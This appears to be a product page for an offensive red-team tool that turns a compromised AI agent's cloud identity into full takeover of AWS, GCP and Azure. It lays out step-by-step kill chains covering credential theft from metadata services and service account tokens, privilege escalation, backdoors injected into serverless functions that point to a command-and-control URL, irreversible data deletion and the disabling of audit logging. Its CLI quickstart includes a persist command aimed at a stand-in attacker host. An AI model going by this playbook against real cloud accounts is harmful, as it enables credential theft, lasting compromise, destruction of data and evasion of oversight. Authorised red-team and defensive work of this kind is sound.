T130 — L28 CLOUD INFRASTRUCTURE TAKEOVER

SPECTER CHARYBDIS

You gave your AI agent an IAM role. We turned it into a whirlpool that swallowed your entire cloud. From a single compromised agent token to full AWS, GCP, and Azure domination.

201
Tests
3
Kill Chains
5
WMD Classes
v1.0.0
Version
Back to NIGHTFALL

Overview

AI agents run on cloud infrastructure. They carry IAM roles, service account tokens, managed identities. Every agent is a pivot point into the cloud — and most cloud teams have never modelled that attack path.

SPECTER CHARYBDIS weaponises agentic cloud lateral movement as a complete, four-tier kill chain. Start from a compromised agent context — IMDS, environment variables, a Kubernetes service account token, or an OIDC JWT — and execute real, documented cloud takeover techniques across AWS, GCP, and Azure from a single tool.

Eight subsystems. Three cloud kill chains. Real API calls. Real control plane access. Real serverless backdoors that survive restart. Real irreversible infrastructure annihilation behind a DESTROY gate.

DESTROY gate is irreversible. Cloud infrastructure destroyed by SPECTER CHARYBDIS cannot be recovered without a prior backup. Designed for authorised cloud red team operations only. Defensive pair: M147 Cloud Identity Sentinel.

Eight Subsystems

ENUMERATE OPEN

Detects cloud identity from any agent context: AWS IMDS v2 (PUT token first), GCP metadata server (Metadata-Flavor header), Azure MSI (Metadata: true), environment variables, Kubernetes SA token, OIDC JWT. JWT claims decoded without verification to extract issuer and subject.

PIVOT INJECT

Exchanges initial token for cloud control plane access. AWS: STS AssumeRoleWithWebIdentity / AssumeRole (SigV4) / direct credentials. GCP: service account impersonation via iamcredentials.googleapis.com. Azure: MSAL OBO exchange / client credentials / managed identity direct.

SURVEY INJECT

Enumerates all accessible cloud resources. AWS: S3 buckets, Lambda functions, Secrets Manager secrets. GCP: GCS buckets, Cloud Functions, Secret Manager. Azure: subscriptions, Key Vaults, Storage Accounts. High-value targets classified CRITICAL (secrets/KV) vs HIGH (buckets/functions).

ESCALATE INJECT

Abuses over-permissioned identities. AWS: iam:PassRole + Lambda abuse via SimulatePrincipalPolicy. GCP: Vertex AI service agent hijack (CVSS 9.0) — service-{project_number}@gcp-sa-aiplatform. Azure: Agent ID Administrator role detection (CVSS 8.8), Global Admin check, dangerous Entra role enumeration.

PERSIST UNLEASHED

Installs cloud-native backdoor into serverless function configuration. Injects C2_URL and _CHARYBDIS_PERSIST=1 into Lambda env vars, Cloud Function env, or Azure Function app settings. Survives function restart. Verified against live function APIs.

ANNIHILATE DESTROY

Irreversible cloud infrastructure destruction. AWS: per-bucket S3 object deletion + CloudTrail stop. GCP: per-bucket GCS object deletion + audit log policy disable. Azure: storage container deletion + Key Vault secret purge. DESTROY gate + exact confirm string required.

ENGAGE INJECT

Full pipeline orchestration: ENUMERATE → PIVOT → SURVEY → ESCALATE → [PERSIST if UNLEASHED]. Returns structured EngageResult with steps completed/failed, report ID, blast radius, and kill chain narrative.

REPORT OPEN

Generates CHR-{hex12} Ed25519-signed JSON reports with full lateral movement graph in GraphViz DOT format. Includes MITRE ATT&CK mapping, WMD classes, kill chain narrative per cloud provider, and remediation guidance.

Three Kill Chains

AWS

IMDS v2 (PUT /latest/api/token → GET /latest/meta-data/iam/security-credentials/) ↓ STS AssumeRoleWithWebIdentity / GetCallerIdentity ↓ IAM SimulatePrincipalPolicy → iam:PassRole detected ↓ Lambda UpdateFunctionConfiguration → C2_URL injected (survives restart) ↓ S3 ListObjectsV2 → DeleteObject per key → CloudTrail StopLogging

GCP

Metadata server (Metadata-Flavor: Google) → service account token ↓ iamcredentials.googleapis.com generateAccessToken (SA impersonation) ↓ Vertex AI service agent: service-{project_number}@gcp-sa-aiplatform (CVSS 9.0) ↓ Cloud Functions PATCH → environmentVariables injected (survives restart) ↓ GCS storage.objects.list → storage.objects.delete → audit log policy wipe

Azure

IMDS Managed Identity (Metadata: true, api-version=2021-02-01) → MSI token ↓ MSAL OBO (grant_type=urn:ietf:params:oauth:grant-type:jwt-bearer) ↓ Graph API /me/memberOf → Agent ID Administrator detected (CVSS 8.8) ↓ Function App GET/PUT appsettings → C2_URL injected (survives restart) ↓ Blob ?comp=list → container DELETE → Key Vault secret DELETE

Entry Points

ENUMERATE accepts cloud identity from any AI agent runtime context:

AWS IMDS v2

169.254.169.254 — IMDSv2 PUT token required. Extracts temporary credentials from EC2/ECS/Lambda instance role.

GCP Metadata Server

metadata.google.internal — Metadata-Flavor: Google header required. Extracts access token from service account.

Azure IMDS / MSI

169.254.169.254/metadata/identity — Metadata: true header. Extracts managed identity access token.

Environment Variables

AWS_ACCESS_KEY_ID / GOOGLE_APPLICATION_CREDENTIALS / AZURE_CLIENT_ID and related env vars from agent process environment.

Kubernetes SA Token

/var/run/secrets/kubernetes.io/serviceaccount/token — JWT decoded to extract issuer URL and subject for OIDC-based STS exchange.

OIDC JWT

Pass via --oidc-token. Issuer URL pattern-matched (amazonaws.com / googleapis.com / login.microsoftonline.com) for provider detection.

Gate Requirements

OPEN:      no env vars required (ENUMERATE, REPORT)

INJECT:    CHARYBDIS_INJECT_TOKEN=<any value>
           Unlocks: PIVOT, SURVEY, ESCALATE, ENGAGE

UNLEASHED: CHARYBDIS_UNLEASHED_TOKEN=<any value>
           Unlocks: PERSIST

DESTROY:   CHARYBDIS_DESTROY_KEY=/path/to/ed25519.key
           CHARYBDIS_ROE_FILE=/path/to/roe.txt
           ROE file must contain: "cloud annihilation authorised"
           --confirm-annihilation flag required
           confirm string: "I UNDERSTAND THIS WILL IRREVERSIBLY DESTROY CLOUD INFRASTRUCTURE"
           Unlocks: ANNIHILATE

CLI Quickstart

pip install -e .

# Detect cloud identity from current agent context
charybdis enumerate

# With OIDC token from compromised agent
charybdis enumerate --oidc-token <jwt> --json-output

# Pivot to cloud control plane
export CHARYBDIS_INJECT_TOKEN=$(openssl rand -hex 32)
charybdis pivot --session CHR-XXXXXXXXXXXX

# Survey accessible resources
charybdis survey --session CHR-XXXXXXXXXXXX

# Check escalation vectors
charybdis escalate --session CHR-XXXXXXXXXXXX

# Install serverless backdoor (UNLEASHED)
export CHARYBDIS_UNLEASHED_TOKEN=$(openssl rand -hex 32)
charybdis persist --session CHR-XXXXXXXXXXXX --c2 http://attacker.com:9999

# Full pipeline in one command
charybdis engage --oidc-token <jwt> --unleashed

# Generate signed report with lateral movement DOT graph
charybdis report --session CHR-XXXXXXXXXXXX --dot
charybdis report --session CHR-XXXXXXXXXXXX --save

# Check active gate status
charybdis gate-status
Full CLI Reference →

WMD Classes

MITRE ATT&CK

Defensive Pair

M147 — Cloud Identity Sentinel (AI Shield) — Monitors cloud audit logs for anomalous token exchanges, cross-service privilege escalations, and agent-originated API calls. Detects IMDS enumeration patterns, STS AssumeRole chains, service account impersonation, and OBO token exchanges. Triggers automated containment via role revocation and alert escalation.